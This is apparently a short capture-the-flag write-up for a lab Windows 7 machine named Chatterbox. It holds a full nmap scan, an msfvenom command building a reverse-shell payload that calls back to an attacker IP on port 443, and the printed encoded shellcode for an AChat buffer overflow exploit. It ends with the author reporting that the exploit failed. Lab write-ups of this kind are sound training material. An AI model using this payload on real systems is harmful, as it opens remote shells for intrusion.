Skip to content

Chatterbox

Enumeration

$ nmap -A -T4 --min-rate 5000 -p- -n -Pn --open 10.10.10.74
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-13 12:57 CEST
Nmap scan report for 10.10.10.74
Host is up (0.040s latency).
Not shown: 64601 closed tcp ports (reset), 923 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
9255/tcp  open  mon?
9256/tcp  open  unknown
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).


Network Distance: 2 hops
Service Info: Host: CHATTERBOX; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Chatterbox
|   NetBIOS computer name: CHATTERBOX\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2025-06-13T11:58:58-04:00
|_clock-skew: mean: 6h20m00s, deviation: 2h18m35s, median: 4h59m59s
| smb2-time: 
|   date: 2025-06-13T15:58:57
|_  start_date: 2025-06-13T00:27:44
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled but not required

Investigating the ports, we find that the program running is achat. Using searchsploit, get the first one, rbo.

Following the exploit, generate the payload with msfvenom.

$ msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.14.17 LPORT=443 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/unicode_mixed
x86/unicode_mixed succeeded with size 774 (iteration=0)
x86/unicode_mixed chosen with final size 774
Payload size: 774 bytes
Final size of python file: 3822 bytes
buf =  b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51"
buf += b"\x41\x44\x41\x5a\x41\x42\x41\x52\x41\x4c\x41\x59"
buf += b"\x41\x49\x41\x51\x41\x49\x41\x51\x41\x49\x41\x68"
buf += b"\x41\x41\x41\x5a\x31\x41\x49\x41\x49\x41\x4a\x31"
buf += b"\x31\x41\x49\x41\x49\x41\x42\x41\x42\x41\x42\x51"
buf += b"\x49\x31\x41\x49\x51\x49\x41\x49\x51\x49\x31\x31"
buf += b"\x31\x41\x49\x41\x4a\x51\x59\x41\x5a\x42\x41\x42"
buf += b"\x41\x42\x41\x42\x41\x42\x6b\x4d\x41\x47\x42\x39"
buf += b"\x75\x34\x4a\x42\x6b\x4c\x49\x58\x74\x42\x4b\x50"
buf += b"\x79\x70\x59\x70\x33\x30\x72\x69\x5a\x45\x70\x31"
buf += b"\x65\x70\x70\x64\x62\x6b\x50\x50\x70\x30\x42\x6b"
buf += b"\x6e\x72\x5a\x6c\x52\x6b\x52\x32\x4c\x54\x42\x6b"
buf += b"\x53\x42\x4f\x38\x4c\x4f\x44\x77\x70\x4a\x6e\x46"
buf += b"\x50\x31\x4b\x4f\x66\x4c\x4f\x4c\x53\x31\x71\x6c"
buf += b"\x4b\x52\x4e\x4c\x6d\x50\x66\x61\x56\x6f\x6a\x6d"
buf += b"\x6b\x51\x56\x67\x57\x72\x78\x72\x50\x52\x6f\x67"
buf += b"\x62\x6b\x72\x32\x7a\x70\x44\x4b\x4d\x7a\x4f\x4c"
buf += b"\x72\x6b\x6e\x6c\x5a\x71\x74\x38\x7a\x43\x4e\x68"
buf += b"\x4b\x51\x56\x71\x4f\x61\x32\x6b\x50\x59\x6b\x70"
buf += b"\x7a\x61\x68\x53\x72\x6b\x30\x49\x6a\x78\x78\x63"
buf += b"\x4e\x5a\x61\x39\x44\x4b\x6d\x64\x62\x6b\x6a\x61"
buf += b"\x68\x56\x6e\x51\x6b\x4f\x46\x4c\x57\x51\x46\x6f"
buf += b"\x6a\x6d\x4d\x31\x39\x37\x70\x38\x79\x50\x31\x65"
buf += b"\x68\x76\x79\x73\x31\x6d\x59\x68\x4f\x4b\x63\x4d"
buf += b"\x4f\x34\x62\x55\x48\x64\x6e\x78\x54\x4b\x51\x48"
buf += b"\x6c\x64\x6a\x61\x37\x63\x6f\x76\x34\x4b\x6c\x4c"
buf += b"\x4e\x6b\x62\x6b\x51\x48\x6b\x6c\x4b\x51\x49\x43"
buf += b"\x34\x4b\x4d\x34\x54\x4b\x4d\x31\x68\x50\x54\x49"
buf += b"\x71\x34\x6d\x54\x4c\x64\x4f\x6b\x31\x4b\x50\x61"
buf += b"\x50\x59\x70\x5a\x50\x51\x59\x6f\x6b\x30\x4f\x6f"
buf += b"\x6f\x6f\x61\x4a\x52\x6b\x5a\x72\x68\x6b\x44\x4d"
buf += b"\x31\x4d\x63\x38\x6c\x73\x4d\x62\x39\x70\x6d\x30"
buf += b"\x6f\x78\x63\x47\x52\x53\x4e\x52\x4f\x6f\x42\x34"
buf += b"\x42\x48\x6e\x6c\x50\x77\x4e\x46\x6c\x47\x39\x6f"
buf += b"\x5a\x35\x36\x58\x54\x50\x6d\x31\x39\x70\x6d\x30"
buf += b"\x6b\x79\x58\x44\x70\x54\x52\x30\x51\x58\x6b\x79"
buf += b"\x45\x30\x70\x6b\x6b\x50\x59\x6f\x49\x45\x70\x50"
buf += b"\x72\x30\x4e\x70\x4e\x70\x6f\x50\x30\x50\x4f\x50"
buf += b"\x30\x50\x73\x38\x57\x7a\x4a\x6f\x79\x4f\x39\x50"
buf += b"\x59\x6f\x5a\x35\x43\x67\x71\x5a\x4a\x65\x32\x48"
buf += b"\x79\x7a\x59\x7a\x5a\x6e\x4a\x71\x62\x48\x6c\x42"
buf += b"\x79\x70\x5a\x61\x45\x6b\x65\x39\x6a\x46\x72\x4a"
buf += b"\x5a\x70\x50\x56\x52\x37\x32\x48\x33\x69\x64\x65"
buf += b"\x33\x44\x6f\x71\x49\x6f\x48\x55\x45\x35\x57\x50"
buf += b"\x53\x44\x4a\x6c\x59\x6f\x30\x4e\x6a\x68\x62\x55"
buf += b"\x5a\x4c\x52\x48\x5a\x50\x47\x45\x56\x42\x72\x36"
buf += b"\x39\x6f\x59\x45\x62\x48\x62\x43\x30\x6d\x63\x34"
buf += b"\x6b\x50\x42\x69\x38\x63\x6e\x77\x4f\x67\x4f\x67"
buf += b"\x4d\x61\x5a\x56\x51\x5a\x6d\x42\x31\x49\x32\x36"
buf += b"\x47\x72\x6b\x4d\x63\x36\x37\x57\x4d\x74\x6c\x64"
buf += b"\x6d\x6c\x4a\x61\x6d\x31\x54\x4d\x61\x34\x4e\x44"
buf += b"\x6e\x30\x75\x76\x39\x70\x71\x34\x6f\x64\x30\x50"
buf += b"\x62\x36\x42\x36\x6e\x76\x6f\x56\x71\x46\x50\x4e"
buf += b"\x32\x36\x4e\x76\x72\x33\x42\x36\x53\x38\x31\x69"
buf += b"\x48\x4c\x6d\x6f\x71\x76\x4b\x4f\x78\x55\x71\x79"
buf += b"\x77\x70\x30\x4e\x62\x36\x51\x36\x79\x6f\x6e\x50"
buf += b"\x70\x68\x6d\x38\x51\x77\x6b\x6d\x63\x30\x49\x6f"
buf += b"\x66\x75\x55\x6b\x6c\x30\x44\x75\x56\x42\x50\x56"
buf += b"\x6f\x78\x36\x46\x52\x75\x47\x4d\x33\x6d\x59\x6f"
buf += b"\x79\x45\x4f\x4c\x79\x76\x43\x4c\x7a\x6a\x53\x50"
buf += b"\x6b\x4b\x77\x70\x73\x45\x6d\x35\x47\x4b\x31\x37"
buf += b"\x6e\x33\x31\x62\x62\x4f\x70\x6a\x6d\x30\x70\x53"

And change the server address.

But the exploit won't work; the machine seems broken as of today.

$ python3 36025.py
---->{P00F}!

Bug

Machine out of service.